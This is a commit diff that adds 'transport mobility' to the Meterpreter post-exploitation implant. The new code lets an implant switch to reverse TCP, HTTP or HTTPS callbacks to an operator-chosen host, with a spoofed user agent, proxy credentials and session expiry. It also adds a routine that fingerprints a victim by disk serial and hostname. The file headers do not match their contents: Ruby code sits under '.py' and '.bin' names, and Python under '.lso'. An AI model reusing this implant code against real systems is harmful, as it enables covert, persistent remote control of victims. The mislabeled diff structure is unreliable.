Land rapid7#5046, meterpreter transport mobility support

Author: Brent Cook

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.29.0)
-      meterpreter_bins (= 0.0.17)
+      meterpreter_bins (= 0.0.18)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -132,7 +132,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.17)
+    meterpreter_bins (0.0.18)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.2)

data/meterpreter/ext_server_networkpug.lso

@@ -1,6 +1,7 @@
 #!/usr/bin/python
 import code
 import os
+import platform
 import random
 import select
 import socket
@@ -141,6 +142,8 @@
 TLV_TYPE_MIGRATE_PID           = TLV_META_TYPE_UINT    | 402
 TLV_TYPE_MIGRATE_LEN           = TLV_META_TYPE_UINT    | 403
 
+TLV_TYPE_MACHINE_ID            = TLV_META_TYPE_STRING  | 460
+
 TLV_TYPE_CIPHER_NAME           = TLV_META_TYPE_STRING  | 500
 TLV_TYPE_CIPHER_PARAMETERS     = TLV_META_TYPE_GROUP   | 501
 
@@ -566,6 +569,36 @@ def handle_dead_resource_channel(self, channel_id):
 		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
 		self.send_packet(pkt)
 
+	def _core_machine_id(self, request, response):
+		serial = ''
+		machine_name = platform.uname()[1]
+		if has_windll:
+			from ctypes import wintypes
+
+			k32 = ctypes.windll.kernel32
+			sys_dir = ctypes.create_unicode_buffer(260)
+			if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
+				return ERROR_FAILURE_WINDOWS
+
+			vol_buf = ctypes.create_unicode_buffer(260)
+			fs_buf = ctypes.create_unicode_buffer(260)
+			serial_num = wintypes.DWORD(0)
+
+			if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
+					vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
+					None, fs_buf, ctypes.sizeof(fs_buf)):
+				return ERROR_FAILURE_WINDOWS
+			serial_num = serial_num.value
+			serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
+		else:
+			for _, _, files in os.walk('/dev/disk/by-id/'):
+				for f in files:
+					if f[:4] == 'ata-':
+						serial = f[4:]
+						break
+		response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
+		return ERROR_SUCCESS, response
+
 	def _core_loadlib(self, request, response):
 		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:

data/meterpreter/ext_server_sniffer.lso

@@ -351,7 +351,7 @@ def on_request(cli, req, obj)
         })
 
       else
-        print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
+        print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} #{req.inspect}...")
         resp.code    = 200
         resp.message = "OK"
         resp.body    = datastore['HttpUnknownRequestResponse'].to_s

data/meterpreter/ext_server_stdapi.lso

@@ -2,7 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/uuid'
-require 'rex/payloads/meterpreter/uri_checksum.rb'
+require 'rex/payloads/meterpreter/uri_checksum'
 
 #
 # This module provides datastore option definitions and helper methods for payload modules that support UUIDs

data/meterpreter/meterpreter.py

@@ -11,6 +11,13 @@
 # Provides methods to patch options into the metsrv stager.
 require 'rex/payloads/meterpreter/patch'
 
+# URI uuid and checksum stuff
+require 'msf/core/payload/uuid'
+require 'rex/payloads/meterpreter/uri_checksum'
+
+# certificate hash checking
+require 'rex/parser/x509_certificate'
+
 module Rex
 module Post
 module Meterpreter
@@ -28,6 +35,22 @@ class ClientCore < Extension
   UNIX_PATH_MAX = 108
   DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
 
+  METERPRETER_TRANSPORT_SSL   = 0
+  METERPRETER_TRANSPORT_HTTP  = 1
+  METERPRETER_TRANSPORT_HTTPS = 2
+
+  DEFAULT_SESSION_EXPIRATION = 24*3600*7
+  DEFAULT_COMMS_TIMEOUT = 300
+
+  VALID_TRANSPORTS = {
+    'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
+    'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
+    'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
+    'bind_tcp'      => METERPRETER_TRANSPORT_SSL
+  }
+
+  include Rex::Payloads::Meterpreter::UriChecksum
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
@@ -222,6 +245,87 @@ def use(mod, opts = { })
     return true
   end
 
+  def machine_id
+    request = Packet.create_request('core_machine_id')
+
+    response = client.send_request(request)
+
+    id = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
+    # TODO: Determine if we're going to MD5/SHA1 this
+    return Rex::Text.md5(id)
+  end
+
+  def change_transport(opts={})
+
+    unless valid_transport?(opts[:transport]) && opts[:lport]
+      return false
+    end
+
+    if opts[:transport].starts_with?('reverse')
+      return false unless opts[:lhost]
+    else
+      # Bind shouldn't have lhost set
+      opts[:lhost] = nil
+    end
+
+    transport = VALID_TRANSPORTS[opts[:transport]]
+
+    request = Packet.create_request('core_change_transport')
+
+    scheme = opts[:transport].split('_')[1]
+    url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
+
+    # do more magic work for http(s) payloads
+    unless opts[:transport].ends_with?('tcp')
+      sum = uri_checksum_lookup(:connect)
+      uuid = client.payload_uuid
+      unless uuid
+        arch, plat = client.platform.split('/')
+        uuid = Msf::Payload::UUID.new({
+          arch:     arch,
+          platform: plat.starts_with?('win') ? 'windows' : plat
+        })
+      end
+      url << generate_uri_uuid(sum, uuid) + '/'
+
+      opts[:comms_timeout] ||= DEFAULT_COMMS_TIMEOUT
+      request.add_tlv(TLV_TYPE_TRANS_COMMS_TIMEOUT, opts[:comms_timeout])
+
+      opts[:session_exp] ||= DEFAULT_SESSION_EXPIRATION
+      request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
+
+      # TODO: randomise if not specified?
+      opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
+      request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
+
+      if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
+        hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
+        request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
+      end
+
+      if opts[:proxy_host] && opts[:proxy_port]
+        prefix = 'http://'
+        prefix = 'socks=' if opts[:proxy_type] == 'socks'
+        proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
+        request.add_tlv(TLV_TYPE_TRANS_PROXY_INFO, proxy)
+
+        if opts[:proxy_user]
+          request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
+        end
+        if opts[:proxy_pass]
+          request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
+        end
+      end
+
+    end
+
+    request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
+    request.add_tlv(TLV_TYPE_TRANS_URL, url)
+
+    client.send_request(request)
+    return true
+  end
+
   #
   # Migrates the meterpreter instance to the process specified
   # by pid.  The connection to the server remains established.
@@ -246,7 +350,7 @@ def migrate(pid, writable_dir = nil)
     }
 
     # We cant migrate into a process that does not exist.
-    if process.nil?
+    unless process
       raise RuntimeError, "Cannot migrate into non existent process", caller
     end
 
@@ -404,6 +508,13 @@ def shutdown
     true
   end
 
+  #
+  # Indicates if the given transport is a valid transport option.
+  #
+  def valid_transport?(transport)
+    VALID_TRANSPORTS.has_key?(transport.downcase)
+  end
+
   private
 
   def generate_payload_stub(process)

data/meterpreter/msflinker_linux_x86.bin

@@ -87,6 +87,19 @@ module Meterpreter
 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT   | 408
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
 
+
+TLV_TYPE_TRANS_TYPE          = TLV_META_TYPE_UINT   | 430
+TLV_TYPE_TRANS_URL           = TLV_META_TYPE_STRING | 431
+TLV_TYPE_TRANS_UA            = TLV_META_TYPE_STRING | 432
+TLV_TYPE_TRANS_COMMS_TIMEOUT = TLV_META_TYPE_UINT   | 433
+TLV_TYPE_TRANS_SESSION_EXP   = TLV_META_TYPE_UINT   | 434
+TLV_TYPE_TRANS_CERT_HASH     = TLV_META_TYPE_RAW    | 435
+TLV_TYPE_TRANS_PROXY_INFO    = TLV_META_TYPE_STRING | 436
+TLV_TYPE_TRANS_PROXY_USER    = TLV_META_TYPE_STRING | 437
+TLV_TYPE_TRANS_PROXY_PASS    = TLV_META_TYPE_STRING | 438
+
+TLV_TYPE_MACHINE_ID          = TLV_META_TYPE_STRING | 460
+
 TLV_TYPE_CIPHER_NAME         = TLV_META_TYPE_STRING | 500
 TLV_TYPE_CIPHER_PARAMETERS   = TLV_META_TYPE_GROUP  | 501
 
@@ -179,6 +192,16 @@ def inspect
       when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
       when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
       when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
+      when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
+      when TLV_TYPE_TRANS_URL; "TRANS-URL"
+      when TLV_TYPE_TRANS_COMMS_TIMEOUT; "TRANS-COMMS-TIMEOUT"
+      when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
+      when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
+      when TLV_TYPE_TRANS_PROXY_INFO; "TRANS-PROXY-INFO"
+      when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
+      when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
+
+      when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
 
       #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
       #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'